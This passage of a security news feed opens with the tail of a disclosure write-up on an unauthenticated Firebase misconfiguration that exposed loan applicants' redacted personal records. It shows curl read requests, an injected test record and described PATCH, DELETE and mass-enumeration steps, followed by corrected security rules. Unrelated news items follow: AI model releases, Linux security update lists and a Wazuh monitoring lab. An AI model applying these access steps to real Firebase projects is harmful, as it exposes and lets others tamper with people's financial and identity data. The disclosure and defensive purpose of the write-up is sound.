"14030[REDACTED]" },<br>    "sms":          { "stringValue": "+62812[REDACTED]" },<br>    "address":      { "stringValue": "GG [REDACTED]" },<br>    "ktpKelurahan": { "stringValue": "[REDACTED]" },<br>    "ktpKecamatan": { "stringValue": "[REDACTED]" },<br>    "bankName":     { "stringValue": "bri" },<br>    "updatedAt":    { "stringValue": "2026-02-21 08:23:16" },<br>    "geoTagHome": {<br>      "mapValue": { "fields": {<br>        "latitude":  { "doubleValue": [REDACTED] },<br>        "longitude": { "doubleValue": [REDACTED] }<br>      }}<br>    },<br>    "photoPerson":     { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." },<br>    "photoHome":       { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." },<br>    "photoPersonBuss": { "stringValue": "https://storage.googleapis.com/[REDACTED]/survey/8039829/..." }</pre><p>The `updatedAt` field: five days before the test. This was not a staging environment or a demo dataset. A real person’s record, updated five days prior, containing their full name, national ID number (`legalId`), phone number, home address, sub-district and district, bank name, and precise GPS home coordinates, alongside direct URLs to their personal and home photos.</p><p>The photo URLs pointed to Google Cloud Storage. Those were also accessible without authentication, because the Storage bucket itself was open.</p><p>There were hundreds of records like this one, spread across the `2020xxxxxx` and `5001xxxxxx` ID ranges. Customer-level PII for every person who had ever been registered on the platform, sitting in an unauthenticated REST endpoint.</p><h4><strong>The Loans Collection: Financial Records</strong></h4><p>The `loans` collection stored individual loan records, each linked back to a customer via the `customerNumber` field. This cross-reference was how specific customer IDs with active records were first confirmed enumerate loans, extract `customerNumber`, query that customer directly.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/loans/1000041"</pre><p>HTTP 200:</p><pre>{<br>  "fields": {<br>    "id":             { "stringValue": "1000041" },<br>    "customerNumber": { "stringValue": "20200[REDACTED" },<br>    "purpose":        { "stringValue": "Ternak Sapi" },<br>    "principal": {<br>      "mapValue": { "fields": {<br>        "amount":   { "stringValue": "4000000" },<br>        "currency": { "stringValue": "IDR" }<br>      }}<br>    },<br>    "disbursedDate":  { "stringValue": "2021-01-27T09:33:55.22747Z" },<br>    "sector":         { "stringValue": "Peternakan" },<br>    "state":          { "stringValue": "CLOSED" },<br>    "subState":       { "stringValue": "PAID OFF" },<br>    "docs": { "arrayValue": { "values": [{<br>      "mapValue": { "fields": {<br>        "type": { "stringValue": "doc-loa" },<br>        "url":  { "stringValue": "https://storage.googleapis.com/[REDACTED]/doc-loa/DocumentLOA_100004120210127...pdf" }<br>      }}<br>    }]}}<br>  }<br>}</pre><p>Each loan record contained: loan ID, customer cross-reference, stated loan purpose, principal amount and currency, disbursement date, economic sector, current state (active, closed, paid off), and a direct URL to the signed loan agreement PDF stored in Firebase Storage.</p><p>Those document URLs were also accessible without authentication.</p><p>The `loans` collection contained hundreds of records spanning disbursement dates from 2021 through 2026, representing the full history of lending activity on the platform.</p><h3>The Surveys Collection: The Most Sensitive Data</h3><p>The `surveys` collection was where the filled loan applications lived. If `customers` showed you the borrower profile, `surveys` showed you the entire loan application submission, every field from that 114-field schema in Storage, populated with real data from a real person who submitted it to request a loan.</p><p>Each survey document had two layers: top-level processed fields (credit score, approval status, loan cycle) and a nested `_raw` map containing the complete verbatim form submission.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/surveys/1093924"</pre><p>HTTP 200. Application #1093924, borrower [REDACTED]:</p><pre>[Top-level processed fields]<br>  fullname:         [REDACTED]<br>  creditScoreValue: 814.05<br>  creditScoreGrade: A<br>  stage:            APPROVED_BM<br>  loanCycle:        1<br><br>[_raw — complete form submission]<br>  client_fullname:             [REDACTED]<br>  client_ktp:                  [REDACTED - National ID Number]<br>  client_birthdate:            [REDACTED]<br>  client_birthplace:           Pekalongan<br>  client_religion:             Islam<br>  client_jenis_kelamin:        Perempuan<br>  client_maritalstatus:        Menikah<br>  client_ibu_kandung:          [REDACTED - Mother's maiden name]<br>  client_phone:                [REDACTED]<br>  client_alamat:               [REDACTED]<br>  client_kecamatan:            [REDACTED]<br>  client_kota_kab:             Pekalongan<br>  client_provinsi:             Jawa Tengah<br>  geotagging:                  [REDACTED]<br>  data_suami:                  [REDACTED - Husband's name]<br>  client_ktp_penanggung_jawab: [REDACTED - Guarantor's National ID]<br>  data_pengajuan:              3,000,000 IDR<br>  plafond:                     3,000,000 IDR<br>  rate:                        0.3167 (31.67%/year)<br>  installment:                 79,000 IDR/week<br>  tenor:                       50 weeks<br>  disbursementDate:            2021-06-08<br><br>  photo_ktp:                   https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client_selfie:         https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client:                https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_client_house:          https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  photo_ktp_penanggung_jawab:  https://storage.googleapis.com/[REDACTED]/survey/1093924/...jpeg<br>  client_digital_signature:    https://storage.googleapis.com/[REDACTED]/survey/1839892/...<br>  form_tr:                     https://storage.googleapis.com/[REDACTED]/loan/1178404/...pdf</pre><p>Let me be specific about what this single document contained:</p><p>Full name. <strong>National ID number (NIK)</strong>. Date of birth. Birthplace. Religion. Gender. Marital status. Mother’s maiden name. Phone number. Full home address including street, sub-district, district, and province. Precise GPS coordinates of home. Husband’s full name. Guarantor’s national ID number. Loan amount requested. Approved loan amount. Annual interest rate. Weekly installment amount. Loan tenor in weeks. Disbursement date. Credit score value and letter grade. Internal approval stage and loan cycle number.</p><p>Plus direct URLs, all unauthenticated, to: the borrower’s KTP (national ID card) photo, a selfie, a personal photo, a home exterior photo, the guarantor’s KTP photo, the borrower’s digital signature, and the signed loan agreement PDF.</p><p>This is a complete financial and personal identity dossier. In aggregate, the `surveys` collection contained hundreds of records in this format. Every person who had ever submitted a loan application on this platform.</p><h3>Write Access: When Read Is Not the Worst Part</h3><p>Reading hundreds of borrower records is a serious confidentiality violation. But the security rules that permitted reading also permitted writing, modifying, and deleting.full CRUD access with no authentication at any point.</p><p>Creating a new document in any collection:</p><pre>## Construct from the Firestore REST API<br>...<br>...<br><br>payload = {<br>    "fields": {<br>        "name":    {"stringValue": "ATTACKER INJECTED"},<br>        "legalId": {"stringValue": "9999999999999999"}<br>    }<br>}<br># POST to /documents/customers → HTTP 200</pre><p>Response:</p><pre>{<br>  "name": "projects/[PROJECT-ID]/databases/(default)/documents/customers/TYF6XDy0lXqazvvepLhy",<br>  "fields": {<br>    "name":    {"stringValue": "ATTACKER INJECTED"},<br>    "legalId": {"stringValue": "9999999999999999"}<br>  },<br>  "createTime": "2026-02-26T12:17:39.658121Z"</pre><p>Modifying an existing document: PATCH to the document path with new field values; HTTP 200, record overwritten.</p><p>Deleting a document: DELETE to the document path, HTTP 200, record permanently gone with no recovery path.</p><p>I created a canary document in an isolated test collection to confirm write access, then immediately deleted it. No real records were modified or deleted. But the access was real and unrestricted.</p><p>What write and delete access means in practice for a production lending platform:</p><p><strong>Fraudulent record injection:</strong> Insert fake borrower records or loan approvals directly into production collections, bypassing the application’s validation layer entirely.</p><p><strong>Data tampering:</strong> Modify loan amounts, approval statuses, credit scores, or repayment records for any existing borrower. A bad actor could mark a loan as repaid, change a credit grade from F to A, or alter disbursement amounts.</p><p><strong>Evidence destruction:</strong> Delete loan records, customer profiles, or survey submissions. For a regulated financial platform, missing records are a compliance and legal liability.</p><p><strong>Full exfiltration:</strong> Script sequential reads across the customer ID ranges to pull every borrower record in the database. The API imposes no rate limiting that would prevent this.</p><p>The misconfiguration does not distinguish between a researcher running a single test and an attacker running a scripted sweep. The same rules or lack of rules, apply to both.</p><h3><strong>What Comes After the Chain Completes</strong></h3><p>When a chain like this closes, the feeling is not triumph. A single bug is a door. A chain like this is discovering that the building has no locks and never did.</p><p>I kept thinking about the scale. Not abstractly, specifically. The `customers` collection had hundreds of records. The `surveys` collection had hundreds of complete application submissions. Every person who had ever applied for a loan on this platform, every piece of information they had submitted in trust, sitting in a public API endpoint with no access control whatsoever.</p><p>The `surveys` collection was the part that stayed with me. It wasn’t just that PII was exposed. It was the completeness of it. Religion. Mother’s maiden name. Husband’s name. A credit score. A digital signature. The kind of data that, in aggregate, is a complete personal, financial, and social profile of a person. Fields that exist in a loan application precisely because they are sensitive, identity verification, anti-fraud, credit assessment. And all of it retrievable by anyone who could type a URL.</p><p>I stopped enumerating after confirming the pattern across a small number of records. The vulnerability was proven. Going further would have meant accessing data I had no legitimate reason to read.</p><p>What I didn’t stop thinking about was how long this had been this way. The oldest loan records dated back to 2021. The `updatedAt` timestamps in the `customers` collection showed active updates through the week of the test. This wasn’t a recently deployed misconfiguration. It had been open for years, across the entire operational life of the platform, while the borrowers it served had no idea.</p><h3>The Lesson: Test Every Service, Every Time</h3><p>The pattern that makes Firebase misconfiguration so common is the way teams think about security at the project level rather than the service level.</p><p>A developer secures the Realtime Database. They write rules, test them, they work. They move on with the assumption that the other services are handled the same way. But Firestore has its own rules file, separate from the Realtime Database. Storage has its own rules file, separate from Firestore. Each service has to be configured independently.</p><p>The team that built this platform did exactly one thing right: they locked down the Realtime Database. If you only look at that service, the security posture looks considered. But they built the real application data on Firestore and Storage, and neither had rules.</p><p>This is now a reflexive part of how I approach any Firebase-backed application. Find the `init.json`. Extract the `projectId`. Test all three services. Don’t assume that one secured service means the others are secured. The pattern holds more often than it should: if one is misconfigured, check the others immediately.</p><p>The Realtime Database 403 was almost misleading. It created a superficial impression of a team that thought about security. The impression collapsed the moment I tested Firestore.</p><h3>The Fix</h3><p>Every Firebase service has its own security rules configuration, managed in the Firebase Console or deployed via the Firebase CLI. The Firestore and Storage rules for this project were at the default open state. In Firestore, that default looks like this:</p><pre>// Default open rules — anyone, anywhere, no authentication required<br>rules_version = '2';<br>service cloud.firestore {<br>  match /databases/{database}/documents {<br>    match /{document=**} {<br>      allow read, write;<br>    }<br>  }<br>}</pre><p>The baseline fix is requiring authentication before any access:</p><pre>rules_version = '2';<br>service cloud.firestore {<br>  match /databases/{database}/documents {<br>    match /{document=**} {<br>      allow read, write: if request.auth != null;<br>    }<br>  }<br>}</pre><p>For Storage, the same baseline in `storage.rules`:</p><pre>rules_version = '2';<br>service firebase.storage {<br>  match /b/{bucket}/o {<br>    match /{allPaths=**} {<br>      allow read, write: if request.auth != null;<br>    }<br>  }<br>}</pre><p>The right model goes further. In a lending platform, not every authenticated user should read every document. The correct rules reflect the application’s actual access model:</p><ul><li>A borrower can read and update only their own customer record.</li><li>A loan officer can read records associated with their assigned branch or group.</li><li>Survey submissions can only be read by the submitting borrower or authorized staff.</li><li>No user, authenticated or not should have delete access to production financial records without an explicit admin role check.</li></ul><p>But `if request.auth != null` is the baseline that eliminates unauthenticated access entirely. It’s two words added to an existing rule. The team already knew the syntax, the Realtime Database rules proved it. The rules for Firestore and Storage just weren’t there.</p><p>One consistent decision applied across three services instead of one closes the entire chain.</p><h3>What init.json Is and Isn’t</h3><p>The `init.json` file is not the vulnerability. It cannot and should not be removed. Firebase web apps need it to initialize, and removing it breaks the frontend SDK. There are no secrets in that file that should be hidden.</p><p>The vulnerability is a mental model error: “the frontend needs this config file, therefore the backend is safe because clients have to go through the frontend first.” That assumption is wrong. The Firebase REST APIs are public-facing, fully documented, and completely bypasses the frontend. Any attacker can construct a valid Firestore or Storage request using nothing but the `projectId` and a terminal.</p><p>The security boundary in Firebase exists only in the server-side rules. The `init.json` file tells you where every service lives. The rules file controls whether you can get inside. If the rules file is empty, the boundary is empty.</p><p>Every Firebase project I review now, I check all three services. The pattern holds more reliably than it should: if a team misconfigured one, they usually misconfigured the others. The Realtime Database being secured here was the exception. Two out of three services wide open was enough for full compromise of hundreds of borrower records.</p><blockquote>The woman who submitted her loan application did everything she was supposed to do. She trusted that the platform had done the basic things platforms are supposed to do. A two-line rule change in a configuration file, applied when the database was first created, would have made that trust warranted.</blockquote><blockquote>It wasn’t applied. This is what that cost.</blockquote><p><em>If you’re building on Firebase: open the Firebase Console right now, go to Firestore → Rules, Storage → Rules, and Realtime Database → Rules. Read each one carefully. If any of them contain `allow read, write;` without a condition, that service is open to the public internet at this moment.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=90d568038414" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind-90d568038414">No Rules, No Locks: Firebase Misconfiguration and the Borrowers It Left Behind</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Releases GPT-Realtime-2.1 and GPT-Realtime-2.1-mini for Low-Latency Voice Agents in the API]]></title>
<description><![CDATA[OpenAI added two Realtime models to its API. GPT-Realtime-2.1-mini is a mini reasoning model for voice, priced like the earlier gpt-realtime-mini. OpenAI also cut p95 latency by at least 25% through improved caching. Here is what changed, how pricing compares, and how to connect over WebRTC.
The ...]]></description>
<link>https://tsecurity.de/de/3650492/ai-nachrichten/openai-releases-gpt-realtime-21-and-gpt-realtime-21-mini-for-low-latency-voice-agents-in-the-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650492/ai-nachrichten/openai-releases-gpt-realtime-21-and-gpt-realtime-21-mini-for-low-latency-voice-agents-in-the-api/</guid>
<pubDate>Tue, 07 Jul 2026 06:48:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI added two Realtime models to its API. GPT-Realtime-2.1-mini is a mini reasoning model for voice, priced like the earlier gpt-realtime-mini. OpenAI also cut p95 latency by at least 25% through improved caching. Here is what changed, how pricing compares, and how to connect over WebRTC.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/06/openai-gpt-realtime-2-1-mini-reasoning-realtime-api/">OpenAI Releases GPT-Realtime-2.1 and GPT-Realtime-2.1-mini for Low-Latency Voice Agents in the API</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (container-tools:rhel8, grafana, grafana-pcp, kernel, ruby:2.5, and ruby:3.3), Debian (bird3, chromium, kernel, linux-6.1, mediawiki, nginx, openvpn, php-phpseclib, php8.2, php8.4, and sympa), Fedora (7zip, buildah, chromium, clamav, freerdp, leptoni...]]></description>
<link>https://tsecurity.de/de/3648889/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648889/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 06 Jul 2026 15:41:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (container-tools:rhel8, grafana, grafana-pcp, kernel, ruby:2.5, and ruby:3.3), <b>Debian</b> (bird3, chromium, kernel, linux-6.1, mediawiki, nginx, openvpn, php-phpseclib, php8.2, php8.4, and sympa), <b>Fedora</b> (7zip, buildah, chromium, clamav, freerdp, leptonica, mariadb10.11, mariadb11.8, nextcloud, nsd, openqa, openvpn, os-autoinst, pdns, pdns-recursor, perl-Crypt-ScryptKDF, podman, python-jupyter-server, and python-streamlink), <b>Mageia</b> (mariadb and yt-dlp), <b>Slackware</b> (libevent, libseccomp, mozilla, mutt, and php82), <b>SUSE</b> (apache2, containerd, dnsmasq, docker, dracut, firewalld-legacy, gimp, glibc, golang-github-docker-libnetwork, google-guest-agent, gstreamer-plugins-bad, helm, kernel, kernel-devel, keybase-client, kitty, krb5, libarchive, libnfs, libslirp, nilfs-utils, openCryptoki, openQA, openssl-3, pacemaker, pcr-oracle, perl-DBI, perl-List-SomeUtils-XS, podman, python-pip, python-pydata-sphinx-theme, python-tornado6, python3-lxml, python311-mistune, python313-joserfc, rmt-server, sg3_utils, systemd, tracker-miners, and xdg-dbus-proxy), and <b>Ubuntu</b> (cifs-utils, linux-nvidia, linux-nvidia-6.17, linux-raspi-realtime, and ncurses).]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time]]></title>
<description><![CDATA[OverviewIn this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, ...]]></description>
<link>https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</guid>
<pubDate>Mon, 06 Jul 2026 08:52:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Overview</h3><p>In this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, and deleting files and folders, and by running a benign malware simulation that triggered Windows processes leading to registry updates. This demonstrated how FIM detects not only direct malicious modifications but also related system-level activity that occurs during suspicious endpoint behavior, supporting incident investigation and root-cause analysis.</p><p>File Integrity Monitoring (FIM) is a security control used to track changes made to files and system configurations. It helps detect when files are created, modified, or deleted, and when critical system areas like the Windows Registry are altered. Since many attacks rely on changing files or registry keys to maintain persistence or evade detection, FIM provides an important layer of visibility into what’s happening on an endpoint. For this project, i used Windows endpoint.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>You can read more about File Integrity Monitoring in official Wazuh Documentation <a href="https://documentation.wazuh.com/current/user-manual/capabilities/file-integrity/how-to-configure-fim.html">here</a></p><h3>Configuration &amp; Detection</h3><ol><li><strong>Edit the agent’s ossec.conf file</strong></li></ol><ul><li>On the Windows endpoint, the Wazuh agent configuration file is located at</li></ul><pre>C:\Program Files (x86)\ossec-agent\ossec.conf</pre><p>and edit the ossec.conf file using notepad (open as an administrator).</p><ul><li>Add the directories you want to monitor within the &lt;syscheck&gt; block</li></ul><pre>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public\Downloads&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Lily\Desktop&lt;/directories&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FvCOZ9zsrpNFIJueyym_mg.jpeg"><figcaption>ossec.conf</figcaption></figure><ul><li>Restart the Wazuh agent to apply changes</li></ul><pre>Restart-Service wazuh-agent</pre><p><strong>2. Test the Configuration</strong></p><ul><li><strong>Create files</strong></li></ul><p>I created a file on Desktop named “Malware Docs”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/309/1*t2EqYJ5s-CzT5CPjy3XF7Q.jpeg"></figure><p><strong>Alert Visualization</strong></p><p>Navigate to Endpoint security &gt; File Integrity Monitoring &gt; Events on the Wazuh dashboard to view the alert generated when the FIM module detects changes in the monitored file. The created file was logged as ‘file added’</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GovN3S1Zqm5TfSX4swCExw.jpeg"><figcaption>files created</figcaption></figure><ul><li><strong>Modify Files</strong></li></ul><p>To demonstrate file modification detection, I edited the contents of a file in the Downloads folder named “Malicious.txt”</p><p><strong>Alert Visualization</strong></p><p>This action was detected by Wazuh File Integrity Monitoring and logged as a “file modification” event in the dashboard.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U69WhITQ5XSQt_M2gCvdEw.jpeg"><figcaption>file modified</figcaption></figure><ul><li><strong>Delete Files</strong></li></ul><p>Several files were deleted, and this activity was detected by Wazuh File Integrity Monitoring and logged as “File deleted” events.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d5uYJbK7Lj43OfFAV4yLBQ.jpeg"><figcaption>files deleted</figcaption></figure><ul><li><strong>Registry Modification</strong></li></ul><p>To demonstrate registry monitoring, I ran a benign malware simulation that attempted to establish persistence. This action triggered legitimate Windows system processes, which in turn updated related registry keys in the background. Wazuh detected these changes and logged them as registry modification events, demonstrating how File Integrity Monitoring can capture both direct malware activity and the secondary system behaviors it provokes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WjRpltYtUzY_kx0L1hWpkg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAQRxfW3ATRLAkQTG0PXFA.jpeg"></figure><h3>Dashboard Insights &amp; Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BqYTVh5qn5LCmGvzoPlpMA.jpeg"><figcaption>FIM Dashboard</figcaption></figure><p>This project demonstrated the practical value of File Integrity Monitoring through hands-on configuration, testing, and analysis using Wazuh. I successfully monitored file systems and Windows Registry keys, validated detection with manual changes and a malware simulation, and used the Wazuh dashboard to turn raw alerts into actionable insights.</p><p>FIM proved to be a critical visibility tool not just for compliance, but for real-time detection, rapid investigation, and understanding attack behaviors through change analysis. By capturing both legitimate and malicious modifications, it serves as a foundational layer in a proactive security posture.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> for inspiring me to take on this project.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=269e384f3fa7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time-269e384f3fa7">Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), Debian (jq and node-lodash), Fedora (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), SUSE (389-ds, 7zip, alsa, amazon-ecs-init, avahi...]]></description>
<link>https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 02 Jul 2026 15:24:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), <b>Debian</b> (jq and node-lodash), <b>Fedora</b> (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), <b>SUSE</b> (389-ds, 7zip, alsa, amazon-ecs-init, avahi, cadvisor, cosign, cups, dnsdist, docker, dracut, firefox, firewalld, giflib, glib-networking, glycin-loaders, google-cloud-sap-agent, google-guest-agent, gsasl, hauler, helm, ImageMagick, kernel, keylime, krb5, libaom, libexif, libgcrypt, libnfs, libssh2_org, loupe, lrzip, mutt, ncurses, nodejs22, openCryptoki, openssh, openssl-3, pacemaker, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-DBI, perl-JavaScript-Minifier-XS, perl-libwww-perl, postfix, python-click, python-idna, python-Markdown, python-joblib, python-handy-archives, python-apache-libcloud, python-WebOb, python-PyGithub, python-soupsieve, python-pip, python-pytest-html, python-python-dotenv, python-python-multipart, python-starlette, python-tornado6, python-zeroconf, python311, python311-jupyter-server, rpcbind, sed, sg3_utils, tar, tiff, and util-linux), and <b>Ubuntu</b> (kernel, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-azure, linux-azure-5.15, linux-azure-fde-5.15, linux-fips, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-realtime, linux, linux-aws, linux-aws-fips, linux-gcp, linux-gcp-fips, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-oracle, linux-realtime, linux-realtime-6.8, linux-oem-6.17, and linux-oem-7.0).]]></content:encoded>
</item>
<item>
<title><![CDATA[Gradium Launches stt-translate and s2s-translate, Real-Time Speech Translation Models Beating gpt-realtime-translate on Accuracy and Latency]]></title>
<description><![CDATA[Gradium released two real-time speech translation models, stt-translate and s2s-translate, covering English, French, German, Spanish, and Portuguese across 20 language pairs. The models collapse the standard three-model cascade into two, pairing single-pass transcription-and-translation with a Gr...]]></description>
<link>https://tsecurity.de/de/3622695/ai-nachrichten/gradium-launches-stt-translate-and-s2s-translate-real-time-speech-translation-models-beating-gpt-realtime-translate-on-accuracy-and-latency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622695/ai-nachrichten/gradium-launches-stt-translate-and-s2s-translate-real-time-speech-translation-models-beating-gpt-realtime-translate-on-accuracy-and-latency/</guid>
<pubDate>Wed, 24 Jun 2026 22:03:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Gradium released two real-time speech translation models, stt-translate and s2s-translate, covering English, French, German, Spanish, and Portuguese across 20 language pairs. The models collapse the standard three-model cascade into two, pairing single-pass transcription-and-translation with a Gradium TTS stage over one duplex WebSocket. Gradium reports a better accuracy-latency tradeoff than gpt-realtime-translate and gemini-3.5-live-translate, plus output voice selection and cloning.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/24/gradium-launches-stt-translate-and-s2s-translate-real-time-speech-translation-models-beating-gpt-realtime-translate-on-accuracy-and-latency/">Gradium Launches stt-translate and s2s-translate, Real-Time Speech Translation Models Beating gpt-realtime-translate on Accuracy and Latency</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise-grade AI image generation in 2 seconds is here: Krea 2 Raw and Turbo available as open weights under custom license]]></title>
<description><![CDATA[While many enterprises have already begun integrating AI-generated images, visuals, graphics and videos into their production workflows — there is also a growing pool of data and subjective commentary indicating AI imagery ultimately looks non-distinct, monotonous, and too unoriginal to ensure a ...]]></description>
<link>https://tsecurity.de/de/3619526/it-nachrichten/enterprise-grade-ai-image-generation-in-2-seconds-is-here-krea-2-raw-and-turbo-available-as-open-weights-under-custom-license/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619526/it-nachrichten/enterprise-grade-ai-image-generation-in-2-seconds-is-here-krea-2-raw-and-turbo-available-as-open-weights-under-custom-license/</guid>
<pubDate>Tue, 23 Jun 2026 22:31:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While many enterprises have already begun integrating AI-generated images, visuals, graphics and videos into their production workflows — there is also a<a href="https://gizmodo.com/ai-image-generators-default-to-the-same-12-photo-styles-study-finds-2000702012"> growing pool of data</a> and subjective commentary indicating AI imagery ultimately looks non-distinct, monotonous, and too unoriginal to ensure a brand and its assets stand out from the pack. That it's "AI slop," in other words. </p><p>AI creative tools startup Krea is hoping to change that trend by<a href="https://x.com/krea_ai/status/2069435590995812396"> opening up the weights</a> to its new frontier AI image model Krea 2 as two versions, "<a href="https://huggingface.co/krea/Krea-2-Raw">Krea 2 Raw</a>" and "<a href="https://huggingface.co/krea/Krea-2-Turbo">Krea 2 Turbo</a>," under a <a href="https://huggingface.co/krea/Krea-2-Raw/blob/main/LICENSE.pdf">custom license </a>that requires firms with more than 50 seats to pay for Enterprise usage, and mandates all users of any size to implement technical safeguards to <!-- -->prevent the generation of illegal materials, non-consensual intimate imagery (NCII), child sexual abuse material (CSAM), or defamatory assets.</p><p>Both models are available for public download on <a href="https://huggingface.co/krea">Hugging Face</a>. The company says the models provide more visual variety than typical AI generators, while maintaining high prompt accuracy, fidelity, and quality. Importantly, they also offer enterprises and users the ability to customize the generative outputs much more than typical proprietary or even other open source models. </p><p>And, for those seeking to generate imagery at high-throughput, <a href="https://www.krea.ai/blog/krea-2-turbo">Krea 2 Turbo's generation speed is only 2 seconds</a>, making it among the fastest now available across open and proprietary AI image generation models.</p><h2><b>AI Image Generator API Speed &amp; Licensing Benchmarks (Mid-2026)</b></h2><table><tbody><tr><td><p><b>Model / Generator</b></p></td><td><p><b>Developer / Platform</b></p></td><td><p><b>Avg. Generation Time</b></p></td><td><p><b>Licensing &amp; Commercial Use</b></p></td><td><p><b>Key Characteristics</b></p></td></tr><tr><td><p>FLUX.1 [schnell] (fast)</p></td><td><p>Prodia</p></td><td><p>0.5 seconds</p></td><td><p>Open Weights (Apache 2.0).</p><p> Fully permissive for free commercial use.</p></td><td><p>Highly optimized endpoint utilizing step distillation to deliver sub-second generation times, representing the absolute floor for current API latency.</p></td></tr><tr><td><p>Z-Image Turbo</p></td><td><p>Replicate / fal.ai</p></td><td><p>1.8 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights require active API usage contracts.</p></td><td><p>Designed for instantaneous inference bursts. Both Replicate and fal.ai achieve identical 1.8-second median times on this model.</p></td></tr><tr><td><p><b>Krea 2 